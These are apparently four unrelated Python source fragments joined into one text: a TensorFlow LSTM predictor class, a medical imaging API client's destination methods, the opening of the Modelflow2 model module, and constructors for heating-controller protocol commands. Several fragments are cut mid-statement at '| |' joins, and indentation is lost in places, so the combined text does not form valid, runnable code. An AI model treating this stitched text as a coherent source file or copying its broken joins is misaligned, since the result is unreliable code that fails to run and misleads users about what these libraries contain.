        # x: (batch, time_steps, input_size); y_: next-step target vectors
        self.x = tf.placeholder(tf.float32, [None, self.time_steps, self.input_size], name='x_input')
        self.y_ = tf.placeholder(tf.float32, [None, self.input_size], name='y_input')
    weights = {
        'in': self.weight_variable([self.input_size, self.hidden_units]),
        'out': self.weight_variable([self.hidden_units, self.input_size])
    }
    biases = {
        'in': self.bias_variable([self.hidden_units, ]),
        'out': self.bias_variable([self.input_size, ])
    }
    # RNN: project every time step into the hidden dimension
    x = tf.reshape(self.x, [-1, self.input_size])
    with tf.name_scope('Wx_plus_b'):
        x_in = tf.matmul(x, weights['in']) + biases['in']
        x_in = tf.reshape(x_in, [-1, self.time_steps, self.hidden_units])
    # basic LSTM Cell.
    cell = tf.contrib.rnn.BasicLSTMCell(self.hidden_units, forget_bias=1.0)
    # lstm cell is divided into two parts (c_state, h_state)
    init_state = cell.zero_state(self.batch_size, dtype=tf.float32)
    outputs, final_state = tf.nn.dynamic_rnn(cell, x_in, initial_state=init_state, time_major=False, scope=self.name_scope)
    # predict from the final hidden state h (final_state[1])
    self.prediction = tf.matmul(final_state[1], weights['out']) + biases['out']  # shape = (batch_size, input_size)
    with tf.name_scope('loss'):
        self.loss = tf.losses.mean_squared_error(labels=self.y_, predictions=self.prediction)
    with tf.name_scope('train'):
        self.train_op = tf.train.AdamOptimizer(self.learning_rate).minimize(self.loss)
    self.sess = tf.Session()
    self.sess.run(tf.local_variables_initializer())
    self.sess.run(tf.global_variables_initializer())
    self.saver=tf.train.Saver(max_to_keep=1)
    #writer = tf.summary.FileWriter("logs/", self.sess.graph)
    #self.merg_op = tf.summary.merge_all()
def handle_predict_data(self, predict_data):
    """Tile a single (time_steps, input_size) sample across the batch axis.

    The TF1 graph is built with a fixed batch_size, so a lone prediction
    sample must be replicated batch_size times before it can be fed.

    :param predict_data: array of shape (time_steps, input_size)
    :returns: array of shape (batch_size, time_steps, input_size)

    Improvement: a single np.repeat replaces the original O(batch_size)
    vstack loop, which re-copied the growing array on every iteration.
    """
    return np.repeat(predict_data[np.newaxis, :], self.batch_size, axis=0)
def get_batches(self, dataset):
    """Slide a window over *dataset* to build (x, y) training batches.

    Each x batch has shape (batch_size, time_steps, input_size); each y batch
    is the vector immediately following each window, (batch_size, input_size).

    :param dataset: 2-D array (num_samples, input_size)
    :returns: (x_batches, y_batches) numpy arrays

    NOTE(review): the range bound length-batch_size-time_steps-1 skips the
    last two valid window start positions (the inclusive maximum is
    length-batch_size-time_steps); confirm whether the margin is intended.
    """
    length = dataset.shape[0]
    x_batches = []
    y_batches = []
    for i in range(length-self.batch_size-self.time_steps-1):
        batch = []
        batch_label = []
        for j in range(self.batch_size):
            # window of time_steps rows, labelled by the row that follows it
            batch.append(dataset[i+j:i+j+self.time_steps])
            batch_label.append(dataset[i+j+self.time_steps])
        x_batches.append(batch)
        y_batches.append(batch_label)
    x_batches = np.array(x_batches)
    y_batches = np.array(y_batches)
    return x_batches, y_batches
def train(self, dataset):
    """Fit the network on *dataset*, checkpointing whenever loss improves.

    :param dataset: 2-D array (num_samples, input_size), already scaled

    NOTE(review): min_loss starts at 1, so the first checkpoint is written
    only once the loss drops below 1 (plausible for MinMax-scaled data —
    confirm). Loss is measured on the first training batch, not a held-out
    set, so it is not a validation metric.
    """
    min_loss = 1
    for i in range(self.epoches+1):
        x_batches, y_batches = self.get_batches(dataset)
        assert len(x_batches) == len(y_batches)
        for j in range(len(x_batches)):
            train_data = x_batches[j]
            train_label = y_batches[j]
            self.sess.run (self.train_op, feed_dict = {self.x: train_data, self.y_: train_label})
        # track loss on the first batch and checkpoint improvements
        train_loss = self.get_loss(x_batches[0], y_batches[0])
        if train_loss < min_loss:
            min_loss = train_loss
            self.saver.save(self.sess, 'models/%s.ckpt'%(self.name_scope))
def get_loss(self, data, label):
    """Return the MSE loss for a (data, label) batch under the current weights."""
    return self.sess.run(self.loss, feed_dict={self.x: data, self.y_: label})
def predict(self, | |
not found')
errors_mapping[('NOT_PERMITTED', None)] = NotPermitted('You are not permitted to do this')
query_data = {
'api': self._api,
'url': '/destination/search/report',
'request_data': request_data,
'errors_mapping': errors_mapping,
'required_sid': True,
}
return QueryO(**query_data)
def retrieve(
    self,
    activity_id,
    send_method,
    study_request_found_id,
    customfield_param=None,
):
    """Retrieve.

    :param activity_id: uuid of the DESTINATION_SEARCH activity to retrieve from
    :param send_method: The method to send a study as a study request response (share|duplicate)
    :param study_request_found_id: UUID of a study request search results to retrieve and send as study request response
    :param customfield_param: Custom field(s) will be set for the study retrieved (optional)
    """
    request_data = {
        'activity_id': activity_id,
        'send_method': send_method,
        'study_request_found_id': study_request_found_id,
    }
    if customfield_param is not None:
        # expand each custom field into its prefixed wire-format key
        for key, value in customfield_param.items():
            request_data['{prefix}{k}'.format(prefix='customfield-', k=key)] = value
    errors_mapping = {
        ('MISSING_FIELDS', None): MissingFields('A required field is missing or does not have data in it. The error_subtype holds a array of all the missing fields'),
        ('NOT_FOUND', None): NotFound('The activity can not be found'),
    }
    return QueryO(
        api=self._api,
        url='/destination/retrieve',
        request_data=request_data,
        errors_mapping=errors_mapping,
        required_sid=True,
    )
def search_mwl(
    self,
    study_id,
    uuid,
    accession_number=None,
    order_date=None,
    order_number=None,
    patient_birth_date=None,
    patient_name=None,
    patient_sex=None,
    patientid=None,
):
    """Search mwl.

    :param study_id: The id of the study we are searching for orders for
    :param uuid: uuid of the destination
    :param accession_number: Accession number to find (optional)
    :param order_date: Order date to find (optional)
    :param order_number: Order number to find (optional)
    :param patient_birth_date: Birth date to find (optional)
    :param patient_name: Patient name to find (optional)
    :param patient_sex: Gender to find (optional)
    :param patientid: Patient id to find (optional)
    """
    request_data = dict(
        accession_number=accession_number,
        order_date=order_date,
        order_number=order_number,
        patient_birth_date=patient_birth_date,
        patient_name=patient_name,
        patient_sex=patient_sex,
        patientid=patientid,
        study_id=study_id,
        uuid=uuid,
    )
    errors_mapping = {
        ('INSUFFICIENT_CRITERIA', None): InsufficientCriteria('Not enough search fields are populated'),
        ('MISSING_FIELDS', None): MissingFields('A required field is missing or does not have data in it. The error_subtype holds a array of all the missing fields'),
        ('NOT_FOUND', None): NotFound('The destination or study can not be found'),
        ('NOT_PERMITTED', None): NotPermitted('You are not permitted to search the destination'),
        ('NOT_SUPPORTED', None): NotSupported('The destination does not support searching a destination'),
    }
    return QueryO(
        api=self._api,
        url='/destination/search/mwl',
        request_data=request_data,
        errors_mapping=errors_mapping,
        required_sid=True,
    )
class AsyncDestination:
"""AsyncDestination."""
def __init__(self, api):
    """Store the low-level API client used to issue queries.

    :param api: configured API transport shared by all namespace objects
    """
    self._api = api
def list(
    self,
    account_id,
    uuid,
    node_id=None,
    serial_no=None,
):
    """List.

    :param account_id: uuid of the account
    :param uuid: uuid of the destination
    :param node_id: node_id
    :param serial_no: serial_no
    """
    request_data = dict(
        account_id=account_id,
        node_id=node_id,
        serial_no=serial_no,
        uuid=uuid,
    )
    errors_mapping = {
        ('FILTER_NOT_FOUND', None): FilterNotFound('The filter can not be found. The error_subtype will hold the filter UUID'),
        ('INVALID_CONDITION', None): InvalidCondition('The condition is not support. The error_subtype will hold the filter expression this applies to'),
        ('INVALID_FIELD', None): InvalidField('The field is not valid for this object. The error_subtype will hold the filter expression this applies to'),
        ('INVALID_SORT_FIELD', None): InvalidSortField('The field is not valid for this object. The error_subtype will hold the field name this applies to'),
        ('INVALID_SORT_ORDER', None): InvalidSortOrder('The sort order for the field is invalid. The error_subtype will hold the field name this applies to'),
        ('MISSING_FIELDS', None): MissingFields('A required field is missing or does not have data in it. The error_subtype holds a array of all the missing fields'),
        ('NOT_FOUND', None): NotFound('The account can not be found'),
        ('NOT_PERMITTED', None): NotPermitted('You are not permitted to view this list'),
    }
    # responses are paginated on the 'destinations' field
    return AsyncQueryOPSF(
        api=self._api,
        url='/destination/list',
        request_data=request_data,
        errors_mapping=errors_mapping,
        required_sid=True,
        paginated_field='destinations',
    )
def add(
self,
account_id,
address,
aetitle,
distributed_destinations,
linked_destination,
linked_qr_activity_in_referred_account,
linked_qr_to_referred_account,
name,
node_id,
path,
port,
c_echo_interval=None,
c_echo_schedule=None,
can_mwl_search=None,
can_push_hl7=None,
can_query_retrieve=None,
can_retrieve_thin=None,
can_search=None,
cd_burn_info=None,
cd_burn_name=None,
cd_burn_priority=None,
default_query_retrieve_level=None,
fire_webhooks=None,
gateway_settings=None,
hl7_address=None,
hl7_fetch_filter=None,
hl7_port=None,
manual_push_roles=None,
push_related_studies=None,
sort_order=None,
sqlch_psh_if_img_unchg=None,
sqlch_psh_if_route_hl7=None,
type=None,
ui_json=None,
):
"""Add.
:param account_id: uuid of the account
:param address: Address of the destination (required if DICOM type)
:param aetitle: Aetitle of the destination (required if DICOM type)
:param distributed_destinations: A JSON array of destination ids. This list will be used to process requests in round robin manner. Meaningful for DISTRIBUTING destination type only (opional)
:param linked_destination: uuid of the destination for LINKED destinations
:param linked_qr_activity_in_referred_account: A flag to create DESTINATION_SEARCH activities in the linked destination's account. Meaningful for LINKED destinations only (opional)
:param linked_qr_to_referred_account: A flag to create resultant studies in the linked destination's account (not the account of LINKED destination where the search was initiated). Meaningful for LINKED destinations only (opional)
:param name: Name of the destination
:param node_id: uuid of the node that handles the destination
:param path: Path of the folder for a FOLDER type of destination (required if FOLDER type)
:param port: Port of the destination (required if DICOM type)
:param c_echo_interval: Interval in seconds to C echo the destination (optional)
:param c_echo_schedule: C echo schedule (optional)
:param can_mwl_search: Can this destination support searching a modality work list (optional)
:param can_push_hl7: Can this destination support pushong Hl7 messages (optional)
:param can_query_retrieve: Can this destination support query retrieve from HL7 messages (optional)
:param can_retrieve_thin: Can this destination support retrieving thin studies (optional)
:param can_search: Can this destination support searching (optional)
:param cd_burn_info: A JSON hash with the CD burning information (optional)
:param cd_burn_name: Name for the CD burner software (optional)
:param cd_burn_priority: Integer value for the burner priority (optional)
:param default_query_retrieve_level: Default query retrieve level this can be either (study|series|image) and defaults to study if not specified (optional)
:param fire_webhooks: Fire webhooks for events associated with this destination (optional)
:param gateway_settings: Gateway settings (optional)
:param hl7_address: Address of an attached HL7 destination (optional except for VIRTUAL destinations)
:param hl7_fetch_filter: A transform condition expression (see /transform/add for format) to match against the HL7 message. Only fire a query retrieve if the message matches the condition (optional)
:param hl7_port: Port of an attached HL7 destination (optional except for VIRTUAL destinations)
:param manual_push_roles: A comma separated list of role uuids, a user is required to have one of them to manually push to this destination (optional)
:param push_related_studies: Push all the related studies (same MRN/patientid) in the namespace when a study is pushed (optional)
:param sort_order: Integer value for sorting (optional)
:param sqlch_psh_if_img_unchg: Squelch pushes to the destination if the image count has not changed and the push is by a routing rule (optional)
:param sqlch_psh_if_route_hl7: Squelch pushes to the destination if the push was generated by HL7 triggered routing (optional)
:param type: Type of the destination either DICOM, FOLDER, ACCELERATOR,VIRTUAL, BURNER, XDS, LINKED, DISTRIBUTING or UPLOADER. Defaults to DICOM (optional)
:param ui_json: JSON for UI settings (optional)
"""
request_data = {
'account_id': account_id,
'address': address,
'aetitle': aetitle,
'c_echo_interval': c_echo_interval,
'c_echo_schedule': c_echo_schedule,
'can_mwl_search': can_mwl_search,
'can_push_hl7': can_push_hl7,
'can_query_retrieve': can_query_retrieve,
'can_retrieve_thin': can_retrieve_thin,
'can_search': can_search,
'cd_burn_info': cd_burn_info,
'cd_burn_name': cd_burn_name,
'cd_burn_priority': cd_burn_priority,
'default_query_retrieve_level': default_query_retrieve_level,
'distributed_destinations': distributed_destinations,
'fire_webhooks': fire_webhooks,
'gateway_settings': gateway_settings,
'hl7_address': hl7_address,
'hl7_fetch_filter': hl7_fetch_filter,
'hl7_port': hl7_port,
'linked_destination': linked_destination,
'linked_qr_activity_in_referred_account': linked_qr_activity_in_referred_account,
'linked_qr_to_referred_account': linked_qr_to_referred_account,
'manual_push_roles': manual_push_roles,
'name': name,
'node_id': node_id,
'path': path,
'port': port,
'push_related_studies': push_related_studies,
'sort_order': sort_order,
'sqlch_psh_if_img_unchg': sqlch_psh_if_img_unchg,
'sqlch_psh_if_route_hl7': sqlch_psh_if_route_hl7,
'type': type,
'ui_json': ui_json,
}
errors_mapping = {}
errors_mapping[('DUP_AETITLE', None)] = DupAetitle('Duplicate aetitle. All destinations for the same node must have a unique aetitle')
errors_mapping[('INVALID_CD_BURN_INFO', None)] = InvalidCdBurnInfo('Invalid cd_burn_info. The error_subtype holds more detail')
errors_mapping[('INVALID_DISTRIBUTED_DESTINATION', None)] = InvalidDistributedDestination('distributed_destinations configuration is invalid')
errors_mapping[('INVALID_FLAG', None)] = InvalidFlag('An invalid flag was passed. The error_subtype holds the name of the invalid flag')
errors_mapping[('INVALID_GATEWAY_TYPE', None)] = InvalidGatewayType('The type is wrong for the gateway it is getting attached to')
errors_mapping[('INVALID_INTEGER', None)] = InvalidInteger('An invalid integer was passed. The error_subtype holds the name of the invalid integer')
errors_mapping[('INVALID_NODE_TYPE', None)] = InvalidNodeType('The node is not a harvester')
errors_mapping[('INVALID_NODE_TYPE', None)] = InvalidNodeType('The node type is invalid for this type of destination')
errors_mapping[('INVALID_SCHEDULE', None)] = InvalidSchedule('The schedule is invalid. The error_subtype holds the error detail')
errors_mapping[('INVALID_TYPE', None)] = InvalidType('An invalid type was passed')
errors_mapping[('INVALID_VALUE', None)] = InvalidValue('An invalid value | |
# Repository: Freya-Antonia/Modelflow2
# -*- coding: utf-8 -*-
"""
Created on Mon Sep 02 19:41:11 2013
This module creates model class instances.
@author: Ib
"""
import model_Excel as me
from pathlib import Path
from io import StringIO
import json
from collections import defaultdict, namedtuple
from itertools import groupby, chain, zip_longest
import re
import pandas as pd
import sys
import networkx as nx
import fnmatch
import numpy as np
from itertools import chain
from collections import Counter
import time
from contextlib import contextmanager
import os
from subprocess import run
import webbrowser as wb
import importlib
import gc
import copy
import matplotlib.pyplot as plt
import zipfile
from functools import partial,cached_property,lru_cache
from tqdm.auto import tqdm
import seaborn as sns
from IPython.display import SVG, display, Image, IFrame, HTML
import ipywidgets as ip
try:
from numba import jit, njit
except:
pass
import os
try:
import xlwings as xw
except:
...
import modelmanipulation as mp
import modelvis as mv
import modelpattern as pt
from modelnet import draw_adjacency_matrix
from modelnewton import newton_diff
import modeljupyter as mj
from modelhelp import cutout, update_var
from modelnormalize import normal
# functions used in BL language
from scipy.stats import norm
from math import isclose, sqrt, erf
from scipy.special import erfinv, ndtri
node = namedtuple('node', 'lev,parent,child')
np.seterr(all='ignore')
class BaseModel():
"""Class which defines a model from equations
In itself the BaseModel is of no use.
The **model** class enriches BaseModel with additional
Mixin classes which has additional methods and properties.
A model instance has a number of properties among which these can be particularly useful:
:allvar: Information regarding all variables
:basedf: A dataframe with first result created with this model instance
:lastdf: A dataframe with the last result created with this model instance
The two result dataframes are used for comparison and visualisation. The user can set both basedf and lastdf.
"""
def __init__(self, i_eq='', modelname='testmodel', silent=False, straight=False, funks=None,
             tabcomplete=True, previousbase=False, use_preorder=True, normalized=True, safeorder=True,
             var_description=None, **kwargs):
    '''Initialize a model instance from equations.

    :i_eq: equations; text without '$' is first normalised via mp.tofrml
    :modelname: name of the model
    :silent: suppress messages while on-boarding the equations
    :straight: skip dependency-graph reordering, solve in input order
    :funks: user functions referenced by the equations. Defaults to no
        functions. (Fixed: was a mutable default argument ``[]`` shared
        between instances; now created fresh per call.)
    :tabcomplete: enable tab completion (slow for very large models)
    :previousbase: use the previous run (not the first) as basedf
    :use_preorder: use a prolog in sim2d for non-topological models
    :var_description: mapping variable name -> description. Defaults to
        an empty dict (the same mutable-default fix applies).

    Note: when i_eq is the empty string nothing is initialised, matching
    the original behaviour.
    '''
    funks = [] if funks is None else funks
    var_description = {} if var_description is None else var_description
    if i_eq != '':
        self.funks = funks
        # '$'-delimited equations are assumed to already be in frml form
        self.equations = i_eq if '$' in i_eq else mp.tofrml(i_eq, sep='\n')
        self.name = modelname
        # if True the dependency graph will not be called and calculation will be in input sequence
        self.straight = straight
        self.save = True  # saves the dataframe in self.basedf, self.lastdf
        self.analyzemodelnew(silent)  # on-board the model equations
        self.maxstart = 0
        self.genrcolumns = []
        # do we want tab completion (slows down input for large models)
        self.tabcomplete = tabcomplete
        # set basedf to the previous run instead of the first run
        self.previousbase = previousbase
        self.safeorder = safeorder
        if not self.istopo or self.straight:
            self.use_preorder = use_preorder  # if prolog is used in sim2d
        else:
            self.use_preorder = False
        self.keep_solutions = {}
        self.set_var_description(var_description)
    return
@classmethod
def from_eq(cls, equations, modelname='testmodel', silent=False, straight=False, funks=None,
            params=None, tabcomplete=True, previousbase=False, normalized=True,
            norm=True, sym=False, sep='\n', **kwargs):
    """
    Creates a model from macro Business logic language.

    The model specification is first exploded into normalised frml form,
    syntax-checked, and then used to construct an instance of *cls*.

    Args:
        :equations: The model specification
        :modelname: Name of the model. Defaults to 'testmodel'.
        :silent: Suppress messages. Defaults to False.
        :straight: Don't reorder the model. Defaults to False.
        :funks: Functions incorporated in the model specification.
            Defaults to no functions. (Fixed: previously a mutable default
            argument ``[]`` shared between calls.)
        :params: For later use. Defaults to an empty dict (same fix as
            for funks).
        :tabcomplete: Allow tab completion in editor; time consuming for
            large models. Defaults to True.
        :previousbase: Use previous run as basedf, not the first.
            Defaults to False.
        :norm: Normalize the model. Defaults to True.
        :sym: If normalizing, do it symbolically. Defaults to False.
        :sep: Separator between equations. Defaults to a newline.

    Returns:
        A model instance.
    """
    funks = [] if funks is None else funks
    params = {} if params is None else params
    udrullet = mp.explode(equations, norm=norm,
                          sym=sym, funks=funks, sep=sep)
    pt.check_syntax_model(udrullet)
    mmodel = cls(udrullet, modelname, silent=silent, straight=straight, funks=funks,
                 tabcomplete=tabcomplete, previousbase=previousbase, normalized=normalized, **kwargs)
    mmodel.equations_original = equations
    return mmodel
def get_histmodel(self):
    """Return a model instance that generates historic values for the
    equations whose frml name is I or IDENT."""
    historic_equations = mp.find_hist_model(self.equations)
    model_class = type(self)
    return model_class(historic_equations, funks=self.funks)
def analyzemodelnew(self, silent):
''' Analyze a model
The function creats:**Self.allvar** is a dictory with an entry for every variable in the model
the key is the variable name.
For each endogeneous variable there is a directory with thees keys:
:maxlag: The max lag for this variable
:maxlead: The max Lead for this variable
:endo: 1 if the variable is endogeneous (ie on the left hand side of =
:frml: String with the formular for this variable
:frmlnumber: The number of the formular
:varnr: Number of this variable
:terms: The frml for this variable translated to terms
:frmlname: The frmlname for this variable
:startnr: Start of this variable in gauss seidel solutio vector :Advanced:
:matrix: This lhs element is a matrix
:dropfrml: If this frml shoud be excluded from the evaluation.
In addition theese properties will be created:
:endogene: Set of endogeneous variable in the model
:exogene: Se exogeneous variable in the model
:maxnavlen: The longest variable name
:blank: An emty string which can contain the longest variable name
:solveorder: The order in which the model is solved - initaly the order of the equations in the model
'''
gc.disable()
mega = pt.model_parse(self.equations, self.funks)
termswithvar = {t for (f, nt) in mega for t in nt if t.var}
# varnames = list({t.var for t in termswithvar})
termswithlag = sorted([(t.var, '0' if t.lag == '' else t.lag)
for t in termswithvar], key=lambda x: x[0]) # sorted by varname and lag
groupedvars = groupby(termswithlag, key=lambda x: x[0])
varmaxlag = {varandlags[0]: (
min([int(t[1]) for t in list(varandlags[1])])) for varandlags in groupedvars}
groupedvars = groupby(termswithlag, key=lambda x: x[0])
varmaxlead = {varandlags[0]: (
max([int(t[1]) for t in list(varandlags[1])])) for varandlags in groupedvars}
# self.maxlag = min(varmaxlag[v] for v in varmaxlag.keys())
self.maxlag = min(v for k, v in varmaxlag.items())
self.maxlead = max(v for k, v in varmaxlead.items())
self.allvar = {name: {
'maxlag': varmaxlag[name],
'maxlead': varmaxlead[name],
'matrix': 0,
# 'startnr' : 0,
'endo': 0} for name in {t.var for t in termswithvar}}
# self.aequalterm = ('','','=','','') # this is how a term with = looks like
# this is how a term with = looks like
self.aequalterm = ('', '=', '', '')
for frmlnumber, ((frml, fr, n, udtryk), nt) in enumerate(mega):
# find the position of =
assigpos = nt.index(self.aequalterm)
# variables to the left of the =
zendovar = [t.var for t in nt[:assigpos] if t.var]
# do this formular define a matrix on the left of =
boolmatrix = pt.kw_frml_name(n, 'MATRIX')
for pos, endo in enumerate(zendovar):
if self.allvar[endo]['endo']:
print(' **** On the left hand side several times: ', endo)
self.allvar[endo]['dropfrml'] = (1 <= pos)
self.allvar[endo]['endo'] = 1
self.allvar[endo]['frmlnumber'] = frmlnumber
self.allvar[endo]['frml'] = frml
self.allvar[endo]['terms'] = nt[:]
self.allvar[endo]['frmlname'] = n
self.allvar[endo]['matrix'] = boolmatrix
self.allvar[endo]['assigpos'] = assigpos
# finished looping over all the equations
self.endogene = {
x for x in self.allvar.keys() if self.allvar[x]['endo']}
self.exogene = {
x for x in self.allvar.keys() if not self.allvar[x]['endo']}
self.exogene_true = {
v for v in self.exogene if not v+'___RES' in self.endogene}
# breakpoint()
self.normalized = not all((v.endswith('___RES')
for v in self.endogene))
self.endogene_true = self.endogene if self.normalized else {
v for v in self.exogene if v+'___RES' in self.endogene}
# # the order as in the equations
# for iz, a in enumerate(sorted(self.allvar)):
# self.allvar[a]['varnr'] = iz
self.v_nr = sorted([(v, self.allvar[v]['frmlnumber'])
for v in self.endogene], key=lambda x: x[1])
self.nrorder = [v[0] for v in self.v_nr]
if self.straight: # no sequencing
self.istopo = False
self.solveorder = self.nrorder
else:
try:
self.topo = list(nx.topological_sort(self.endograph))
self.solveorder = self.topo
self.istopo = True
self.solveorder = self.topo
# check if there is formulars with several left hand side variables
# this is a little tricky
dropvar = [(v, self.topo.index(v), self.allvar[v]['frmlnumber']) for v in self.topo
if self.allvar[v]['dropfrml']] # all dropped vars and their index in topo and frmlnumber
if len(dropvar):
# all multi-lhs formulars
multiendofrml = {frmlnr for (
var, toposort, frmlnr) in dropvar}
dropthisvar = [v for v in self.endogene # theese should also be droppen, now all are dropped
if self.allvar[v]['frmlnumber'] in multiendofrml
and not self.allvar[v]['dropfrml']]
for var in dropthisvar:
self.allvar[var]['dropfrml'] = True
# now find the first lhs variable in the topo for each formulars. They have to be not dropped
# this means that they should be evaluated first
keepthisvarnr = [min([topoindex for | |
is not None and not isinstance(active, (bool, int)):
raise TypeError(f"Invalid args: active={active}, but must be an bool")
until, duration = _normalise_until(mode, active, until, duration)
payload = "".join(
(
"00",
"01" if bool(active) else "00",
mode,
"FFFFFF" if duration is None else f"{duration:06X}",
"" if until is None else dtm_to_hex(until),
)
)
return cls(W_, _1F41, payload, ctl_id, **kwargs)
@classmethod  # constructor for RQ/10A0
@validate_api_params()
def get_dhw_params(cls, ctl_id: str, **kwargs):
    """Constructor to get the params of the DHW (c.f. parser_10a0)."""
    payload = "00"  # the (only) DHW zone
    return cls(RQ, _10A0, payload, ctl_id, **kwargs)
@classmethod  # constructor for W_/10A0
@validate_api_params()
def set_dhw_params(
    cls,
    ctl_id: str,
    setpoint: float = 50.0,
    overrun: int = 5,
    differential: float = 1,
    **kwargs,
):
    """Constructor to set the params of the DHW (c.f. parser_10a0).

    :param setpoint: DHW setpoint (30.0-85.0); None means the default, 50.0.
    :param overrun: overrun (0-10); None means the default, 5.
    :param differential: differential (1-10); None means the default, 1.0.
    """
    # Defaults for newer evohome colour:
    # Defaults for older evohome colour: ?? (30-85) C, ? (0-10) min, ? (1-10) C
    # Defaults for evohome monochrome:
    # 14:34:26.734 022 W --- 18:013393 01:145038 --:------ 10A0 006 000F6E050064
    # 14:34:26.751 073 I --- 01:145038 --:------ 01:145038 10A0 006 000F6E0003E8
    # 14:34:26.764 074 I --- 01:145038 18:013393 --:------ 10A0 006 000F6E0003E8
    # None means "use the default" for each parameter
    setpoint = 50.0 if setpoint is None else setpoint
    overrun = 5 if overrun is None else overrun
    differential = 1.0 if differential is None else differential
    assert 30.0 <= setpoint <= 85.0, setpoint
    assert 0 <= overrun <= 10, overrun
    assert 1 <= differential <= 10, differential
    # payload: 00 | setpoint (temp hex) | overrun (1 byte) | differential (temp hex)
    payload = f"00{temp_to_hex(setpoint)}{overrun:02X}{temp_to_hex(differential)}"
    return cls(W_, _10A0, payload, ctl_id, **kwargs)
@classmethod  # constructor for RQ/1260
@validate_api_params()
def get_dhw_temp(cls, ctl_id: str, **kwargs):
    """Constructor to get the temperature of the DHW sensor (c.f. parser_1260)."""
    return cls(RQ, _1260, "00", ctl_id, **kwargs)
@classmethod  # constructor for RQ/1030
@validate_api_params(has_zone=True)
def get_mix_valve_params(cls, ctl_id: str, zone_idx: Union[int, str], **kwargs):
    """Constructor to get the mix valve params of a zone (c.f. parser_1030)."""
    payload = f"{zone_idx:02X}00"  # TODO: is the trailing 00 needed?
    return cls(RQ, _1030, payload, ctl_id, **kwargs)
@classmethod  # constructor for W/1030
@validate_api_params(has_zone=True)
def set_mix_valve_params(
    cls,
    ctl_id: str,
    zone_idx: Union[int, str],
    max_flow_setpoint=55,
    min_flow_setpoint=15,
    valve_run_time=150,
    pump_run_time=15,
    **kwargs,
):
    """Constructor to set the mix valve params of a zone (c.f. parser_1030)."""
    assert 0 <= max_flow_setpoint <= 99, max_flow_setpoint
    assert 0 <= min_flow_setpoint <= 50, min_flow_setpoint
    assert 0 <= valve_run_time <= 240, valve_run_time
    assert 0 <= pump_run_time <= 99, pump_run_time
    # after the zone index, each param is a <tag>01<value> triplet (tags C8..CC)
    payload = f"{zone_idx:02X}"
    payload += f"C801{max_flow_setpoint:02X}"
    payload += f"C901{min_flow_setpoint:02X}"
    payload += f"CA01{valve_run_time:02X}"
    payload += f"CB01{pump_run_time:02X}"
    payload += f"CC01{1:02X}"  # trailing CC01 01 -- meaning unconfirmed
    return cls(W_, _1030, payload, ctl_id, **kwargs)
@classmethod  # constructor for RQ/3220
@validate_api_params()
def get_opentherm_data(cls, dev_id: str, msg_id: Union[int, str], **kwargs):
    """Constructor to get (Read-Data) opentherm msg value (c.f. parser_3220)."""
    if not isinstance(msg_id, int):
        msg_id = int(msg_id, 16)  # accept a hex string
    flags = "0080" if parity(msg_id) else "0000"  # header depends on msg_id parity
    return cls(RQ, _3220, f"{flags}{msg_id:02X}0000", dev_id, **kwargs)
@classmethod  # constructor for RQ/0008
@validate_api_params()  # has_zone=Optional
def get_relay_demand(cls, dev_id: str, zone_idx: Union[int, str] = None, **kwargs):
    """Constructor to get the demand of a relay/zone (c.f. parser_0008)."""
    if zone_idx is None:
        payload = "00"
    else:
        payload = f"{zone_idx:02X}"
    return cls(RQ, _0008, payload, dev_id, **kwargs)
@classmethod  # constructor for RQ/0404
@validate_api_params(has_zone=True)
def get_schedule_fragment(
    cls,
    ctl_id: str,
    zone_idx: Union[int, str],
    frag_idx: int,
    frag_cnt: int,
    **kwargs,
):
    """Constructor to get a schedule fragment (c.f. parser_0404).

    Usually a zone, but will be the DHW schedule if zone_idx == 0xFA, 'FA', or 'HW'.
    """
    # NOTE(review): only the int 0xFA is special-cased here; 'FA'/'HW' are
    # presumably normalised by the decorator -- confirm.
    if zone_idx == 0xFA:
        header = "00230008"  # the DHW schedule
    else:
        header = f"{zone_idx:02X}200008"
    frag_length = 0  # no fragment data is sent with an RQ (presumed)
    payload = f"{header}{frag_length:02X}{frag_idx + 1:02X}{frag_cnt:02X}"
    return cls(RQ, _0404, payload, ctl_id, **kwargs)
@classmethod  # constructor for RQ/0100
@validate_api_params()
def get_system_language(cls, ctl_id: str, **kwargs):
    """Constructor to get the language of a system (c.f. parser_0100)."""
    payload = "00"
    return cls(RQ, _0100, payload, ctl_id, **kwargs)
@classmethod  # constructor for RQ/0418
@validate_api_params()
def get_system_log_entry(cls, ctl_id: str, log_idx: int, **kwargs):
    """Constructor to get a log entry from a system (c.f. parser_0418)."""
    if not isinstance(log_idx, int):
        log_idx = int(log_idx, 16)  # accept a hex string
    return cls(RQ, _0418, f"{log_idx:06X}", ctl_id, **kwargs)
@classmethod  # constructor for RQ/2E04
@validate_api_params()
def get_system_mode(cls, ctl_id: str, **kwargs):
    """Constructor to get the mode of a system (c.f. parser_2e04)."""
    payload = "FF"
    return cls(RQ, _2E04, payload, ctl_id, **kwargs)
@classmethod  # constructor for W/2E04
@validate_api_params()
def set_system_mode(cls, ctl_id: str, system_mode, until=None, **kwargs):
    """Constructor to set/reset the mode of a system (c.f. parser_2e04).

    :param system_mode: the target mode; an int is formatted as 2-digit hex,
        anything else is passed straight to SYSTEM_MODE._hex (may raise KeyError).
    :param until: optional end of the mode; must be None for the permanent
        modes (auto, auto_with_reset, heat_off).
    :raises ValueError: if system_mode is None, or until is given for a
        permanent mode.
    """
    if system_mode is None:
        raise ValueError("Invalid args: system_mode cant be None")
    system_mode = SYSTEM_MODE._hex(
        f"{system_mode:02X}" if isinstance(system_mode, int) else system_mode
    )  # may raise KeyError
    if until is not None and system_mode in (
        SYSTEM_MODE.auto,
        SYSTEM_MODE.auto_with_reset,
        SYSTEM_MODE.heat_off,
    ):
        raise ValueError(
            f"Invalid args: For system_mode={SYSTEM_MODE._str(system_mode)},"
            " until must be None"
        )
    payload = "".join(
        (
            system_mode,
            # NOTE(review): presumably dtm_to_hex(None) returns "" (the
            # sibling constructors guard None explicitly) -- confirm
            dtm_to_hex(until),
            "00" if until is None else "01",  # flag: is an until present?
        )
    )
    return cls(W_, _2E04, payload, ctl_id, **kwargs)
@classmethod  # constructor for RQ/313F
@validate_api_params()
def get_system_time(cls, ctl_id: str, **kwargs):
    """Constructor to get the datetime of a system (c.f. parser_313f)."""
    payload = "00"
    return cls(RQ, _313F, payload, ctl_id, **kwargs)
@classmethod  # constructor for W/313F
@validate_api_params()
def set_system_time(cls, ctl_id: str, datetime, **kwargs):
    """Constructor to set the datetime of a system (c.f. parser_313f)."""
    # W --- 30:185469 01:037519 --:------ 313F 009 0060003A0C1B0107E5
    payload = f"006000{dtm_to_hex(datetime)}"
